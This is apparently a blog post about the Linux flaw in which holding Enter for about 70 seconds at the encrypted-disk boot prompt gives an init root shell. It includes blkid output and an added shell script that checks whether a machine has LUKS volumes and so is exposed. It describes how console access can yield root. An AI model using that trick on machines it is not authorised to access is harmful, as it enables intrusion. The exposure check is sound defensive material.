Holding the "Enter" key for 70 seconds triggers an init root shell

Preface

When I first saw this vulnerability I simply couldn't believe it. Seriously, a backdoor this absurd? So I hammered the key on my own machine for a few minutes until my hand nearly came off, and all it gave back to me was the /etc/issue banner, over and over

\ 
            \          __---__
                    _-       /--______
               __--( /     \ )XXXXXXXXXXX\v.  
             .-XXX(   O   O  )XXXXXXXXXXXXXXX- 
            /XXX(       U     )        XXXXXXX\ 
          /XXXXX(              )--_  XXXXXXXXXXX\ 
         /XXXXX/ (      O     )   XXXXXX   \XXXXX\ 
         XXXXX/   /            XXXXXX   \__ \XXXXX
         XXXXXX__/          XXXXXX         \__---->
 ---___  XXX__/          XXXXXX      \__         /
   \-  --__/   ___/\  XXXXXX            /  ___--/=
    \-\    ___/    XXXXXX              '--- XXXXXX
       \-\/XXX\ XXXXXX                      /XXXXX
         \XXXXXXXXX   \                    /XXXXX/
          \XXXXXX      >                 _/XXXXX/
            \XXXXX--__/              __-- XXXX/
             -XXXXXXXX---------------  XXXXXX-
                \XXXXXXXXXXXXXXXXXXXXXXXXXX/
                    VXXXXXXXXXXXXXXXXXXV

Isn't it cute ~.~

Reproducing the vulnerability

After finally reading the original write-up, I found that triggering this vulnerability requires one precondition.

  • When installing Linux (Ubuntu, for example) you have to pick the "encrypt the disk" option during installation; that is the key to triggering the bug. I ran blkid to look at my own partitions:
/dev/sda1: LABEL="Windows7_0S" UUID="E4B85589B8555ADE" TYPE="ntfs" PARTUUID="167b5d84-01"
/dev/sda2: UUID="wQ04tk-pZSp-nRFw-m0ii-4L2Y-9ie8-gM5hyp" TYPE="LVM2_member" PARTUUID="167b5d84-02"
/dev/sda3: UUID="12c245f2-6788-4e6d-b60d-aa5e795bdfb2" TYPE="ext4" PARTUUID="167b5d84-03"
/dev/sda5: UUID="Xzgqfc-JSJE-Wdhm-TLn6-dfK6-YbnR-ZZgsED" TYPE="LVM2_member" PARTUUID="167b5d84-05"
/dev/mapper/fedora-swap: UUID="515583ce-7cc4-41ce-8241-0c756f963f43" TYPE="swap"
/dev/mapper/fedora-root: UUID="e52e1aa2-f581-464c-af9e-eeebf9d69d47" TYPE="ext4"
/dev/mapper/fedora-home: UUID="8ff0838e-39b0-4e2b-b10c-0cb66901cddf" TYPE="ext4"
/dev/loop0: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"
/dev/mapper/docker-253:1-2363736-pool: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"

No encrypted partition, so I can take my afternoon nap in peace.
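The check the post does by eye (scan blkid output for an encrypted volume) is worth scripting, because a machine with no LUKS container never shows the initramfs passphrase prompt at all, which is also why hammering Enter at a normal login only reprints /etc/issue. The following is an added example, not code from the original post: it parses blkid-format lines from stdin and keys on the TYPE field alone, so a label or UUID that merely contains the word "LUKS" is not counted. The sample input reuses three lines of the post's own blkid output and adds constructed lines (the /dev/sda5 LUKS device, its UUID, and the misleading label are made up for the example).

```shell
#!/bin/sh
# Added example (not from the original post): decide from blkid-style output
# whether any block device is a LUKS container, i.e. whether the encrypted-disk
# precondition for the 70-second-Enter root shell is present on this machine.

# count_luks_volumes: read blkid output on stdin and print how many lines carry
# TYPE="crypto_LUKS". The field separator is the literal ' TYPE="' (leading space),
# so PARTTYPE="..." and label text are never mistaken for the filesystem type.
count_luks_volumes() {
    awk -F' TYPE="' 'NF > 1 { split($2, t, "\""); if (t[1] == "crypto_LUKS") n++ }
                     END { print n + 0 }'
}

# has_luks_volume: exit 0 if at least one LUKS container is present, 1 otherwise.
has_luks_volume() {
    [ "$(count_luks_volumes)" -gt 0 ]
}

# report_exposure: print a one-line verdict for the blkid output on stdin.
report_exposure() {
    n=$(count_luks_volumes)
    if [ "$n" -gt 0 ]; then
        echo "EXPOSED: $n LUKS container(s) found; the boot-time passphrase prompt exists on this machine"
    else
        echo "NOT AFFECTED: no LUKS containers; no passphrase prompt is shown at boot"
    fi
}

# Constructed sample 1: three lines taken from the post's own blkid output (no LUKS),
# plus a made-up ext4 volume whose LABEL contains "LUKS" to show the parser ignores it.
SAMPLE_CLEAN='/dev/sda1: LABEL="Windows7_0S" UUID="E4B85589B8555ADE" TYPE="ntfs" PARTUUID="167b5d84-01"
/dev/sda2: UUID="wQ04tk-pZSp-nRFw-m0ii-4L2Y-9ie8-gM5hyp" TYPE="LVM2_member" PARTUUID="167b5d84-02"
/dev/mapper/fedora-root: UUID="e52e1aa2-f581-464c-af9e-eeebf9d69d47" TYPE="ext4"
/dev/sdb1: LABEL="crypto_LUKS_backup" UUID="aaaaaaaa-0000-1111-2222-333333333333" TYPE="ext4"'

# Constructed sample 2: the same machine as if installed with the encrypted-disk
# option. The /dev/sda5 line (device, UUID) is invented for the example.
SAMPLE_LUKS="$SAMPLE_CLEAN
/dev/sda5: UUID=\"0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0\" TYPE=\"crypto_LUKS\" PARTUUID=\"167b5d84-05\""

# Demo on the constructed samples. On a live system run (as root, so blkid
# reports every device):  blkid | report_exposure
printf '%s\n' "$SAMPLE_CLEAN" | report_exposure
printf '%s\n' "$SAMPLE_LUKS" | report_exposure
```

Run it as root on the machine under test with `blkid | report_exposure`; unprivileged blkid may silently omit devices from its cache, so a "NOT AFFECTED" verdict from a non-root shell is not conclusive.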

Free to redistribute, non-commercial, no derivatives, attribution required (Creative Commons 3.0 license)